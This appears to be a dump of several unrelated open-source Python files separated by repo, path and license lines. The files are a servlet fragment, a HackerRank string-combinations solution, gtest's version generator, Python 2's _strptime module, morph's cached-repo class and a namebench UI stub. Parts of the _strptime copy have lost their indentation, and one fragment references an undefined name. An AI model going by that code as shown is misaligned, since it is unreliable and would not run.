      delegate = _SingletonRenderServletDelegate(self._server_instance)
      return RenderServlet(request, delegate).Get()

    def request_files_in_dir(path, prefix='', strip_ext=None):
      '''Requests every file found under |path| in this host file system, with
      a request prefix of |prefix|. |strip_ext| is an optional list of file
      extensions that should be stripped from paths before requesting.
      '''
      def maybe_strip_ext(name):
        # Never strip the site-verification file's extension.
        if name == SITE_VERIFICATION_FILE or not strip_ext:
          return name
        base, ext = posixpath.splitext(name)
        return base if ext in strip_ext else name
      # NOTE(review): master_fs is undefined here — presumably a host file
      # system obtained from self._server_instance; confirm against upstream.
      files = [maybe_strip_ext(name)
               for name, _ in CreateURLsFromPaths(master_fs, path, prefix)]
      return _RequestEachItem(path, files, render)

    # Only support examples for now.
    if path not in _SUPPORTED_TARGETS:
      return Future(callback=lambda: False)
    dir = _SUPPORTED_TARGETS[path][0]
    prefix = _SUPPORTED_TARGETS[path][1]
    return request_files_in_dir(dir, prefix=prefix)
| bsd-3-clause |
ee08b397/HackerRankAlgorithms | Building a List.py | 1 | 1417 | """
Problem Statement
Chan has decided to make a list of all possible combinations of letters of a given string S. If there are two strings
with the same set of characters, print the lexicographically smallest arrangement of the two strings.
abc acb cab bac bca
all the above strings' lexicographically smallest string is abc.
Each character in the string S is unique. Your task is to print the entire list of Chan's in lexicographic order.
for string abc, the list in lexicographic order is given below
a ab abc ac b bc c
"""
__author__ = 'Danyang'
class Solution(object):
    """Enumerates all subsequences (combinations) of a string's characters in
    lexicographic order."""

    def solve(self, cipher):
        """
        main solution function
        :param cipher: the cipher (a string of unique characters)
        :return: all non-empty combinations of the sorted characters, one per
                 line, in lexicographic order
        """
        # Sorting first guarantees lexicographic output order from the DFS.
        s = "".join(sorted(cipher))
        result = []
        self.dfs(s, "", result)
        # result[0] is the empty prefix; the problem wants non-empty strings.
        return "\n".join(result[1:])

    def dfs(self, seq, cur, result):
        """Depth-first enumeration: record the current prefix, then extend it
        with each remaining character in order.

        :param seq: characters still available (all sorted after `cur`'s last)
        :param cur: combination built so far
        :param result: accumulator list, filled in lexicographic order
        """
        result.append(cur)
        # range() replaces the Py2-only xrange(); iteration is identical and
        # the empty-seq guard is subsumed by range(0) producing nothing.
        for i in range(len(seq)):
            self.dfs(seq[i + 1:], cur + seq[i], result)
# Driver (Python 2 syntax: print statement with trailing comma).
# Reads the test-case count, then for each case an unused length line
# followed by the cipher string, and prints the solution for each.
if __name__=="__main__":
    import sys
    f = open("1.in", "r")
    # f = sys.stdin
    testcases = int(f.readline().strip())
    for t in xrange(testcases):
        # construct cipher
        N = int(f.readline().strip())  # length line; value unused by solve()
        cipher = f.readline().strip()

        # solve
        s = "%s\n"%(Solution().solve(cipher))
        print s,
smartdevice475/sdl_core_346_wince | src/3rd_party-static/gmock-1.7.0/gtest/xcode/Scripts/versiongenerate.py | 3088 | 4536 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A script to prepare version informtion for use the gtest Info.plist file.
This script extracts the version information from the configure.ac file and
uses it to generate a header file containing the same information. The
#defines in this header file will be included in during the generation of
the Info.plist of the framework, giving the correct value to the version
shown in the Finder.
This script makes the following assumptions (these are faults of the script,
not problems with the Autoconf):
1. The AC_INIT macro will be contained within the first 1024 characters
of configure.ac
2. The version string will be 3 integers separated by periods and will be
surrounded by squre brackets, "[" and "]" (e.g. [1.0.1]). The first
segment represents the major version, the second represents the minor
version and the third represents the fix version.
3. No ")" character exists between the opening "(" and closing ")" of
AC_INIT, including in comments and character strings.
"""
import sys
import re
# Read the command line argument (the output directory for Version.h)
# (Python 2 script: uses print statements.)
if (len(sys.argv) < 3):
  print "Usage: versiongenerate.py input_dir output_dir"
  sys.exit(1)
else:
  input_dir = sys.argv[1]
  output_dir = sys.argv[2]

# Read the first 1024 characters of the configure.ac file
config_file = open("%s/configure.ac" % input_dir, 'r')
buffer_size = 1024
opening_string = config_file.read(buffer_size)
config_file.close()

# Extract the version string from the AC_INIT macro
# The following init_expression means:
# Extract three integers separated by periods and surrounded by squre
# brackets(e.g. "[1.0.1]") between "AC_INIT(" and ")". Do not be greedy
# (*? is the non-greedy flag) since that would pull in everything between
# the first "(" and the last ")" in the file.
version_expression = re.compile(r"AC_INIT\(.*?\[(\d+)\.(\d+)\.(\d+)\].*?\)",
                                re.DOTALL)
# NOTE(review): .search() returns None if AC_INIT is absent or beyond the
# first 1024 bytes; the .group() calls below would then raise AttributeError.
version_values = version_expression.search(opening_string)
major_version = version_values.group(1)
minor_version = version_values.group(2)
fix_version = version_values.group(3)

# Write the version information to a header file to be included in the
# Info.plist file.
file_data = """//
// DO NOT MODIFY THIS FILE (but you can delete it)
//
// This file is autogenerated by the versiongenerate.py script. This script
// is executed in a "Run Script" build phase when creating gtest.framework. This
// header file is not used during compilation of C-source. Rather, it simply
// defines some version strings for substitution in the Info.plist. Because of
// this, we are not not restricted to C-syntax nor are we using include guards.
//

#define GTEST_VERSIONINFO_SHORT %s.%s
#define GTEST_VERSIONINFO_LONG %s.%s.%s

""" % (major_version, minor_version, major_version, minor_version, fix_version)
version_file = open("%s/Version.h" % output_dir, 'w')
version_file.write(file_data)
version_file.close()
| bsd-3-clause |
magicrub/MissionPlanner | Lib/_strptime.py | 61 | 20208 | """Strptime-related classes and functions.
CLASSES:
LocaleTime -- Discovers and stores locale-specific time information
TimeRE -- Creates regexes for pattern matching a string of text containing
time information
FUNCTIONS:
_getlang -- Figure out what language is being used for the locale
strptime -- Calculates the time struct represented by the passed-in string
"""
import time
import locale
import calendar
from re import compile as re_compile
from re import IGNORECASE
from re import escape as re_escape
from datetime import date as datetime_date
try:
from thread import allocate_lock as _thread_allocate_lock
except:
from dummy_thread import allocate_lock as _thread_allocate_lock
__all__ = []
def _getlang():
    """Return the (language, encoding) tuple for the current LC_TIME locale."""
    # Figure out what the current language is set to.
    return locale.getlocale(locale.LC_TIME)
class LocaleTime(object):
"""Stores and handles locale-specific information related to time.
ATTRIBUTES:
f_weekday -- full weekday names (7-item list)
a_weekday -- abbreviated weekday names (7-item list)
f_month -- full month names (13-item list; dummy value in [0], which
is added by code)
a_month -- abbreviated month names (13-item list, dummy value in
[0], which is added by code)
am_pm -- AM/PM representation (2-item list)
LC_date_time -- format string for date/time representation (string)
LC_date -- format string for date representation (string)
LC_time -- format string for time representation (string)
timezone -- daylight- and non-daylight-savings timezone representation
(2-item list of sets)
lang -- Language used by instance (2-item tuple)
"""
    def __init__(self):
        """Set all attributes.

        Order of methods called matters for dependency reasons.

        The locale language is set at the offset and then checked again before
        exiting.  This is to make sure that the attributes were not set with a
        mix of information from more than one locale.  This would most likely
        happen when using threads where one thread calls a locale-dependent
        function while another thread changes the locale while the function in
        the other thread is still running.  Proper coding would call for
        locks to prevent changing the locale while locale-dependent code is
        running.  The check here is done in case someone does not think about
        doing this.

        Only other possible issue is if someone changed the timezone and did
        not call tz.tzset .  That is an issue for the programmer, though,
        since changing the timezone is worthless without that call.

        """
        self.lang = _getlang()
        self.__calc_weekday()
        self.__calc_month()
        self.__calc_am_pm()
        self.__calc_timezone()
        self.__calc_date_time()
        # Detect a locale change that raced with the calculations above.
        if _getlang() != self.lang:
            raise ValueError("locale changed during initialization")
def __pad(self, seq, front):
# Add '' to seq to either the front (is True), else the back.
seq = list(seq)
if front:
seq.insert(0, '')
else:
seq.append('')
return seq
def __calc_weekday(self):
# Set self.a_weekday and self.f_weekday using the calendar
# module.
a_weekday = [calendar.day_abbr[i].lower() for i in range(7)]
f_weekday = [calendar.day_name[i].lower() for i in range(7)]
self.a_weekday = a_weekday
self.f_weekday = f_weekday
def __calc_month(self):
# Set self.f_month and self.a_month using the calendar module.
a_month = [calendar.month_abbr[i].lower() for i in range(13)]
f_month = [calendar.month_name[i].lower() for i in range(13)]
self.a_month = a_month
self.f_month = f_month
def __calc_am_pm(self):
# Set self.am_pm by using time.strftime().
# The magic date (1999,3,17,hour,44,55,2,76,0) is not really that
# magical; just happened to have used it everywhere else where a
# static date was needed.
am_pm = []
for hour in (01,22):
time_tuple = time.struct_time((1999,3,17,hour,44,55,2,76,0))
am_pm.append(time.strftime("%p", time_tuple).lower())
self.am_pm = am_pm
def __calc_date_time(self):
# Set self.date_time, self.date, & self.time by using
# time.strftime().
# Use (1999,3,17,22,44,55,2,76,0) for magic date because the amount of
# overloaded numbers is minimized. The order in which searches for
# values within the format string is very important; it eliminates
# possible ambiguity for what something represents.
time_tuple = time.struct_time((1999,3,17,22,44,55,2,76,0))
date_time = [None, None, None]
date_time[0] = time.strftime("%c", time_tuple).lower()
date_time[1] = time.strftime("%x", time_tuple).lower()
date_time[2] = time.strftime("%X", time_tuple).lower()
replacement_pairs = [('%', '%%'), (self.f_weekday[2], '%A'),
(self.f_month[3], '%B'), (self.a_weekday[2], '%a'),
(self.a_month[3], '%b'), (self.am_pm[1], '%p'),
('1999', '%Y'), ('99', '%y'), ('22', '%H'),
('44', '%M'), ('55', '%S'), ('76', '%j'),
('17', '%d'), ('03', '%m'), ('3', '%m'),
# '3' needed for when no leading zero.
('2', '%w'), ('10', '%I')]
replacement_pairs.extend([(tz, "%Z") for tz_values in self.timezone
for tz in tz_values])
for offset,directive in ((0,'%c'), (1,'%x'), (2,'%X')):
current_format = date_time[offset]
for old, new in replacement_pairs:
# Must deal with possible lack of locale info
# manifesting itself as the empty string (e.g., Swedish's
# lack of AM/PM info) or a platform returning a tuple of empty
# strings (e.g., MacOS 9 having timezone as ('','')).
if old:
current_format = current_format.replace(old, new)
# If %W is used, then Sunday, 2005-01-03 will fall on week 0 since
# 2005-01-03 occurs before the first Monday of the year. Otherwise
# %U is used.
time_tuple = time.struct_time((1999,1,3,1,1,1,6,3,0))
if '00' in time.strftime(directive, time_tuple):
U_W = '%W'
else:
U_W = '%U'
date_time[offset] = current_format.replace('11', U_W)
self.LC_date_time = date_time[0]
self.LC_date = date_time[1]
self.LC_time = date_time[2]
def __calc_timezone(self):
# Set self.timezone by using time.tzname.
# Do not worry about possibility of time.tzname[0] == timetzname[1]
# and time.daylight; handle that in strptime .
try:
time.tzset()
except AttributeError:
pass
no_saving = frozenset(["utc", "gmt", time.tzname[0].lower()])
if time.daylight:
has_saving = frozenset([time.tzname[1].lower()])
else:
has_saving = frozenset()
self.timezone = (no_saving, has_saving)
class TimeRE(dict):
    """Handle conversion from format directives to regexes.

    Maps each strftime/strptime directive character (e.g. 'd', 'Y') to a
    regex fragment with a named group of the same name.
    """

    def __init__(self, locale_time=None):
        """Create keys/values.

        Order of execution is important for dependency reasons ('W' is
        derived from 'U'; 'c', 'x' and 'X' are built from the other
        directives via pattern()).
        """
        if locale_time:
            self.locale_time = locale_time
        else:
            self.locale_time = LocaleTime()
        base = super(TimeRE, self)
        base.__init__({
            # The " \d" part of the regex is to make %c from ANSI C work
            'd': r"(?P<d>3[0-1]|[1-2]\d|0[1-9]|[1-9]| [1-9])",
            'f': r"(?P<f>[0-9]{1,6})",
            'H': r"(?P<H>2[0-3]|[0-1]\d|\d)",
            'I': r"(?P<I>1[0-2]|0[1-9]|[1-9])",
            'j': r"(?P<j>36[0-6]|3[0-5]\d|[1-2]\d\d|0[1-9]\d|00[1-9]|[1-9]\d|0[1-9]|[1-9])",
            'm': r"(?P<m>1[0-2]|0[1-9]|[1-9])",
            'M': r"(?P<M>[0-5]\d|\d)",
            'S': r"(?P<S>6[0-1]|[0-5]\d|\d)",
            'U': r"(?P<U>5[0-3]|[0-4]\d|\d)",
            'w': r"(?P<w>[0-6])",
            # W is set below by using 'U'
            'y': r"(?P<y>\d\d)",
            #XXX: Does 'Y' need to worry about having less or more than
            #     4 digits?
            'Y': r"(?P<Y>\d\d\d\d)",
            'A': self.__seqToRE(self.locale_time.f_weekday, 'A'),
            'a': self.__seqToRE(self.locale_time.a_weekday, 'a'),
            'B': self.__seqToRE(self.locale_time.f_month[1:], 'B'),
            'b': self.__seqToRE(self.locale_time.a_month[1:], 'b'),
            'p': self.__seqToRE(self.locale_time.am_pm, 'p'),
            'Z': self.__seqToRE((tz for tz_names in self.locale_time.timezone
                                 for tz in tz_names),
                                'Z'),
            '%': '%'})
        base.__setitem__('W', base.__getitem__('U').replace('U', 'W'))
        base.__setitem__('c', self.pattern(self.locale_time.LC_date_time))
        base.__setitem__('x', self.pattern(self.locale_time.LC_date))
        base.__setitem__('X', self.pattern(self.locale_time.LC_time))

    def __seqToRE(self, to_convert, directive):
        """Convert a list to a regex string for matching a directive.

        Want possible matching values to be from longest to shortest.  This
        prevents the possibility of a match occurring for a value that is
        also a substring of a larger value that should have matched (e.g.,
        'abc' matching when 'abcdef' should have been the match).
        """
        to_convert = sorted(to_convert, key=len, reverse=True)
        for value in to_convert:
            if value != '':
                break
        else:
            # All values were empty strings: nothing sensible to match.
            return ''
        regex = '|'.join(re_escape(stuff) for stuff in to_convert)
        regex = '(?P<%s>%s' % (directive, regex)
        return '%s)' % regex

    def pattern(self, format):
        """Return regex pattern for the format string.

        Need to make sure that any characters that might be interpreted as
        regex syntax are escaped.
        """
        processed_format = ''
        # The sub() call escapes all characters that might be misconstrued
        # as regex syntax.  Cannot use re.escape since we have to deal with
        # format directives (%m, etc.).
        regex_chars = re_compile(r"([\\.^$*+?\(\){}\[\]|])")
        format = regex_chars.sub(r"\\\1", format)
        whitespace_replacement = re_compile('\s+')
        format = whitespace_replacement.sub('\s+', format)
        # Consume the format one '%<directive>' at a time, splicing in the
        # corresponding regex fragment from this dict.
        while '%' in format:
            directive_index = format.index('%')+1
            processed_format = "%s%s%s" % (processed_format,
                                           format[:directive_index-1],
                                           self[format[directive_index]])
            format = format[directive_index+1:]
        return "%s%s" % (processed_format, format)

    def compile(self, format):
        """Return a compiled re object for the format string."""
        return re_compile(self.pattern(format), IGNORECASE)
# Module-level cache shared by every _strptime() call.
_cache_lock = _thread_allocate_lock()
# DO NOT modify _TimeRE_cache or _regex_cache without acquiring the cache lock
# first!
_TimeRE_cache = TimeRE()
_CACHE_MAX_SIZE = 5 # Max number of regexes stored in _regex_cache
_regex_cache = {}
def _calc_julian_from_U_or_W(year, week_of_year, day_of_week, week_starts_Mon):
"""Calculate the Julian day based on the year, week of the year, and day of
the week, with week_start_day representing whether the week of the year
assumes the week starts on Sunday or Monday (6 or 0)."""
first_weekday = datetime_date(year, 1, 1).weekday()
# If we are dealing with the %U directive (week starts on Sunday), it's
# easier to just shift the view to Sunday being the first day of the
# week.
if not week_starts_Mon:
first_weekday = (first_weekday + 1) % 7
day_of_week = (day_of_week + 1) % 7
# Need to watch out for a week 0 (when the first day of the year is not
# the same as that specified by %U or %W).
week_0_length = (7 - first_weekday) % 7
if week_of_year == 0:
return 1 + day_of_week - first_weekday
else:
days_to_week = week_0_length + (7 * (week_of_year - 1))
return 1 + days_to_week + day_of_week
def _strptime(data_string, format="%a %b %d %H:%M:%S %Y"):
    """Return a time struct based on the input string and the format string.

    Returns a (time.struct_time, fraction) 2-tuple, where fraction is the
    microsecond value parsed from any %f directive (0 when absent).
    """
    global _TimeRE_cache, _regex_cache
    with _cache_lock:
        # Rebuild the cached TimeRE whenever the locale has changed since
        # it was constructed; its tables are locale-dependent.
        if _getlang() != _TimeRE_cache.locale_time.lang:
            _TimeRE_cache = TimeRE()
            _regex_cache.clear()
        if len(_regex_cache) > _CACHE_MAX_SIZE:
            _regex_cache.clear()
        locale_time = _TimeRE_cache.locale_time
        format_regex = _regex_cache.get(format)
        if not format_regex:
            try:
                format_regex = _TimeRE_cache.compile(format)
            # KeyError raised when a bad format is found; can be specified as
            # \\, in which case it was a stray % but with a space after it
            except KeyError, err:
                bad_directive = err.args[0]
                if bad_directive == "\\":
                    bad_directive = "%"
                del err
                raise ValueError("'%s' is a bad directive in format '%s'" %
                                 (bad_directive, format))
            # IndexError only occurs when the format string is "%"
            except IndexError:
                raise ValueError("stray %% in format '%s'" % format)
            _regex_cache[format] = format_regex
    found = format_regex.match(data_string)
    if not found:
        raise ValueError("time data %r does not match format %r" %
                         (data_string, format))
    if len(data_string) != found.end():
        raise ValueError("unconverted data remains: %s" %
                         data_string[found.end():])
    # Defaults for fields the format may not mention.
    year = 1900
    month = day = 1
    hour = minute = second = fraction = 0
    tz = -1
    # Default to -1 to signify that values not known; not critical to have,
    # though
    week_of_year = -1
    week_of_year_start = -1
    # weekday and julian defaulted to -1 so as to signal need to calculate
    # values
    weekday = julian = -1
    found_dict = found.groupdict()
    for group_key in found_dict.iterkeys():
        # Directives not explicitly handled below:
        #   c, x, X
        #      handled by making out of other directives
        #   U, W
        #      worthless without day of the week
        if group_key == 'y':
            year = int(found_dict['y'])
            # Open Group specification for strptime() states that a %y
            # value in the range of [00, 68] is in the century 2000, while
            # [69,99] is in the century 1900
            if year <= 68:
                year += 2000
            else:
                year += 1900
        elif group_key == 'Y':
            year = int(found_dict['Y'])
        elif group_key == 'm':
            month = int(found_dict['m'])
        elif group_key == 'B':
            month = locale_time.f_month.index(found_dict['B'].lower())
        elif group_key == 'b':
            month = locale_time.a_month.index(found_dict['b'].lower())
        elif group_key == 'd':
            day = int(found_dict['d'])
        elif group_key == 'H':
            hour = int(found_dict['H'])
        elif group_key == 'I':
            hour = int(found_dict['I'])
            ampm = found_dict.get('p', '').lower()
            # If there was no AM/PM indicator, we'll treat this like AM
            if ampm in ('', locale_time.am_pm[0]):
                # We're in AM so the hour is correct unless we're
                # looking at 12 midnight.
                # 12 midnight == 12 AM == hour 0
                if hour == 12:
                    hour = 0
            elif ampm == locale_time.am_pm[1]:
                # We're in PM so we need to add 12 to the hour unless
                # we're looking at 12 noon.
                # 12 noon == 12 PM == hour 12
                if hour != 12:
                    hour += 12
        elif group_key == 'M':
            minute = int(found_dict['M'])
        elif group_key == 'S':
            second = int(found_dict['S'])
        elif group_key == 'f':
            s = found_dict['f']
            # Pad to always return microseconds.
            s += "0" * (6 - len(s))
            fraction = int(s)
        elif group_key == 'A':
            weekday = locale_time.f_weekday.index(found_dict['A'].lower())
        elif group_key == 'a':
            weekday = locale_time.a_weekday.index(found_dict['a'].lower())
        elif group_key == 'w':
            weekday = int(found_dict['w'])
            # %w uses Sunday == 0; convert to the Monday == 0 convention
            # used throughout this module.
            if weekday == 0:
                weekday = 6
            else:
                weekday -= 1
        elif group_key == 'j':
            julian = int(found_dict['j'])
        elif group_key in ('U', 'W'):
            week_of_year = int(found_dict[group_key])
            if group_key == 'U':
                # U starts week on Sunday.
                week_of_year_start = 6
            else:
                # W starts week on Monday.
                week_of_year_start = 0
        elif group_key == 'Z':
            # Since -1 is default value only need to worry about setting tz if
            # it can be something other than -1.
            found_zone = found_dict['Z'].lower()
            for value, tz_values in enumerate(locale_time.timezone):
                if found_zone in tz_values:
                    # Deal with bad locale setup where timezone names are the
                    # same and yet time.daylight is true; too ambiguous to
                    # be able to tell what timezone has daylight savings
                    if (time.tzname[0] == time.tzname[1] and
                            time.daylight and found_zone not in ("utc", "gmt")):
                        break
                    else:
                        tz = value
                        break
    # If we know the week of the year and what day of that week, we can figure
    # out the Julian day of the year.
    if julian == -1 and week_of_year != -1 and weekday != -1:
        week_starts_Mon = True if week_of_year_start == 0 else False
        julian = _calc_julian_from_U_or_W(year, week_of_year, weekday,
                                          week_starts_Mon)
    # Cannot pre-calculate datetime_date() since can change in Julian
    # calculation and thus could have different value for the day of the week
    # calculation.
    if julian == -1:
        # Need to add 1 to result since first day of the year is 1, not 0.
        julian = datetime_date(year, month, day).toordinal() - \
                 datetime_date(year, 1, 1).toordinal() + 1
    else:  # Assume that if they bothered to include Julian day it will
           # be accurate.
        datetime_result = datetime_date.fromordinal((julian - 1) + datetime_date(year, 1, 1).toordinal())
        year = datetime_result.year
        month = datetime_result.month
        day = datetime_result.day
    if weekday == -1:
        weekday = datetime_date(year, month, day).weekday()
    return (time.struct_time((year, month, day,
                              hour, minute, second,
                              weekday, julian, tz)), fraction)
def _strptime_time(data_string, format="%a %b %d %H:%M:%S %Y"):
    """Parse data_string per format, returning only the time.struct_time."""
    struct_result, _fraction = _strptime(data_string, format)
    return struct_result
| gpl-3.0 |
nuxeh/morph | morphlib/cachedrepo.py | 1 | 9251 | # Copyright (C) 2012-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import cliapp
import os
import tempfile
import morphlib
class CheckoutDirectoryExistsError(cliapp.AppException):
    """Raised when the requested checkout target directory already exists."""

    def __init__(self, repo, target_dir):
        message = ('Checkout directory %s for repo %s already exists' %
                   (target_dir, repo))
        cliapp.AppException.__init__(self, message)
class CloneError(cliapp.AppException):
    """Raised when cloning a cached repository into a directory fails."""

    def __init__(self, repo, target_dir):
        message = 'Failed to clone %s into %s' % (repo.original_name, target_dir)
        cliapp.AppException.__init__(self, message)
class CopyError(cliapp.AppException):
    """Raised when copying a cached repository into a directory fails."""

    def __init__(self, repo, target_dir):
        message = 'Failed to copy %s into %s' % (repo.original_name, target_dir)
        cliapp.AppException.__init__(self, message)
class CheckoutError(cliapp.AppException):
    """Raised when checking out a ref inside a clone fails."""

    def __init__(self, repo, ref, target_dir):
        message = 'Failed to check out ref %s in %s' % (ref, target_dir)
        cliapp.AppException.__init__(self, message)
class UpdateError(cliapp.AppException):
    """Raised when updating a cached repository from its origin fails."""

    def __init__(self, repo):
        message = 'Failed to update cached version of repo %s' % repo
        cliapp.AppException.__init__(self, message)
class CachedRepo(object):

    '''A locally cached Git repository with an origin remote set up.

    One instance of this class represents a locally cached version of a
    remote Git repository. This remote repository is set up as the
    'origin' remote.

    Cached repositories are bare mirrors of the upstream. Locally created
    branches will be lost the next time the repository updates.

    CachedRepo objects can resolve Git refs into SHA1s. Given a SHA1
    ref, they can also be asked to return the contents of a file via the
    cat() method. They can furthermore check out the repository into
    a local directory using a SHA1 ref. Last but not least, any cached
    repo may be updated from its origin remote using the update()
    method.

    '''

    def __init__(self, app, original_name, url, path):
        '''Creates a new CachedRepo for a repo name, URL and local path.'''
        self.app = app
        self.original_name = original_name
        self.url = url
        self.path = path
        # file:// URLs refer to local repos, which are used in place
        # rather than mirrored.
        self.is_mirror = not url.startswith('file://')
        self.already_updated = False
        self._gitdir = morphlib.gitdir.GitDirectory(path)

    def ref_exists(self, ref):  # pragma: no cover
        '''Returns True if the given ref exists in the repo'''
        return self._gitdir.ref_exists(ref)

    def resolve_ref_to_commit(self, ref):  # pragma: no cover
        '''Resolve a named ref to a commit SHA1.

        Raises gitdir.InvalidRefError if the ref does not exist.

        '''
        return self._gitdir.resolve_ref_to_commit(ref)

    def resolve_ref_to_tree(self, ref):  # pragma: no cover
        '''Resolve a named ref to a tree SHA1.

        Raises gitdir.InvalidRefError if the ref does not exist.

        '''
        return self._gitdir.resolve_ref_to_tree(ref)

    def read_file(self, filename, ref):  # pragma: no cover
        '''Attempts to read a file from a given ref.

        Raises a gitdir.InvalidRefError if the ref is not found in the
        repository. Raises an IOError if the requested file is not found
        in the ref.

        '''
        return self._gitdir.read_file(filename, ref)

    def list_files(self, ref, recurse=True):  # pragma: no cover
        '''Return filenames found in the tree pointed to by the given ref.

        Returns a gitdir.InvalidRefError if the ref is not found in the
        repository.

        '''
        return self._gitdir.list_files(ref, recurse)

    def clone_checkout(self, ref, target_dir):
        '''Clone from the cache into the target path and check out a given ref.

        Raises a CheckoutDirectoryExistsError if the target
        directory already exists. Raises a gitdir.InvalidRefError if the
        ref is not found in the repository. Raises a CheckoutError if
        something else goes wrong while copying the repository or checking
        out the SHA1 ref.

        '''
        if os.path.exists(target_dir):
            raise CheckoutDirectoryExistsError(self, target_dir)
        # Fail early with InvalidRefError before any cloning is attempted.
        self._gitdir.resolve_ref_to_commit(ref)
        self._clone_into(target_dir, ref)

    def checkout(self, ref, target_dir):
        '''Unpacks the repository in a directory and checks out a commit ref.

        Raises an gitdir.InvalidRefError if the ref is not found in the
        repository. Raises a CopyError if something goes wrong with the copy
        of the repository. Raises a CheckoutError if something else goes
        wrong while copying the repository or checking out the SHA1 ref.

        '''
        if not os.path.exists(target_dir):
            os.mkdir(target_dir)
        # Note, we copy instead of cloning because it's much faster in the
        # case that the target is on a different filesystem from the cache.
        # We then take care to turn the copy into something as good as a
        # real clone.
        self._copy_repository(self.path, target_dir)
        self._checkout_ref_in_clone(ref, target_dir)

    def extract_commit(self, ref, target_dir):
        '''Extract files from a given commit into target_dir.

        This is different to a 'checkout': a checkout assumes a working tree
        associated with a repository. Here, the repository is immutable
        (it's in the cache) and we just want to look at the files in a quick
        way (quicker than going 'git cat-file everything').

        This seems marginally quicker than doing a shallow clone. Running
        `morph list-artifacts` 10 times gave an average time of 1.334s
        using `git clone --depth 1` and an average time of 1.261s using
        this code.

        '''
        if not os.path.exists(target_dir):
            os.makedirs(target_dir)
        # Use a throwaway index file so the cached repo's own index (if
        # any) is never touched.
        with tempfile.NamedTemporaryFile() as index_file:
            index = self._gitdir.get_index(index_file=index_file.name)
            index.set_to_tree(ref)
            index.checkout(working_tree=target_dir)

    def requires_update_for_ref(self, ref):
        '''Returns False if there's no need to update this cached repo.

        If the ref points to a specific commit that's already available
        locally, there's never any need to update. If it's a named ref and
        this repo wasn't already updated in the lifetime of the current
        process, it's necessary to update.

        '''
        if not self.is_mirror:
            # Repos with file:/// URLs don't ever need updating.
            return False
        if self.already_updated:
            return False
        # Named refs that are valid SHA1s will confuse this code.
        ref_can_change = not morphlib.git.is_valid_sha1(ref)
        return ref_can_change or not self._gitdir.ref_exists(ref)

    def update(self):
        '''Updates the cached repository using its origin remote.

        Raises an UpdateError if anything goes wrong while performing
        the update.

        '''
        if not self.is_mirror:
            # Local (file://) repositories are used in place; nothing to do.
            return
        try:
            self._gitdir.update_remotes(
                echo_stderr=self.app.settings['verbose'])
            self.already_updated = True
        except cliapp.AppException:
            raise UpdateError(self)

    def _runcmd(self, *args, **kwargs):  # pragma: no cover
        # Run a command, defaulting its working directory to the cached repo.
        if 'cwd' not in kwargs:
            kwargs['cwd'] = self.path
        return self.app.runcmd(*args, **kwargs)

    def _clone_into(self, target_dir, ref):  # pragma: no cover
        '''Actually perform the clone'''
        try:
            morphlib.git.clone_into(self._runcmd, self.path, target_dir,
                                    ref)
        except cliapp.AppException:
            raise CloneError(self, target_dir)

    def _copy_repository(self, source_dir, target_dir):  # pragma: no cover
        try:
            morphlib.git.copy_repository(
                self._runcmd, source_dir, target_dir, self.is_mirror)
        except cliapp.AppException:
            raise CopyError(self, target_dir)

    def _checkout_ref_in_clone(self, ref, clone_dir):  # pragma: no cover
        # This is a separate GitDirectory instance. Don't confuse it with
        # the internal ._gitdir attribute!
        working_gitdir = morphlib.gitdir.GitDirectory(clone_dir)
        try:
            working_gitdir.checkout(ref)
        except cliapp.AppException:
            raise CheckoutError(self, ref, clone_dir)
        return working_gitdir

    def __str__(self):  # pragma: no cover
        return self.url
| gpl-2.0 |
dimazalfrianz/namebench | libnamebench/base_ui.py | 172 | 10284 | # Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A base user-interface workflow, to be inherited by UI modules."""
import tempfile
import addr_util
import benchmark
import better_webbrowser
import config
import data_sources
import geoip
import nameserver
import reporter
import providers
import site_connector
import util
__author__ = 'tstromberg@google.com (Thomas Stromberg)'  # Module maintainer contact.
class BaseUI(object):
"""Common methods for all UI implementations."""
def __init__(self):
self.SetupDataStructures()
def SetupDataStructures(self):
"""Instead of requiring users to inherit __init__(), this sets up structures."""
self.reporter = None
self.nameservers = None
self.bmark = None
self.report_path = None
self.csv_path = None
self.geodata = None
self.sources = {}
self.url = None
self.share_state = None
self.test_records = []
def UpdateStatus(self, msg, **kwargs):
"""Update the little status message on the bottom of the window."""
